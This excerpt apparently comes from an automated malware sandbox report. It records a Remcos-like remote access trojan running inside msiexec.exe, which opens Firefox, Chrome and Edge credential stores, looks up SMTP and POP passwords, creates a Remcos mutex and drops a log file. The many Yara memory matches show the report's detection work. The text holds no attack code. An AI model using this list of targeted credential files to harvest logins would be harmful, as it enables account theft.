Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.db Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Code function: ESMTPPassword 16_2_004033F0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, PopPassword 16_2_00402DB3
Source: C:\Windows\SysWOW64\msiexec.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, SMTPPassword 16_2_00402DB3
Source: Yara match File source: Process Memory Space: msiexec.exe PID: 2960, type: MEMORYSTR

Remote Access Functionality

barindex
Source: C:\Windows\SysWOW64\msiexec.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-I42HQ2 Jump to behavior
Source: Yara match File source: 00000008.00000003.2715933734.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.1938405710.0000000008A49000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2717142633.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2723953123.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2715933734.0000000008A44000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2744406884.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2763354092.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2741127584.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2753540863.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.1913901918.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2768723852.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2715771259.0000000008A49000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2743559628.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2723001197.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2754734091.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2735060631.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: msiexec.exe PID: 7800, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs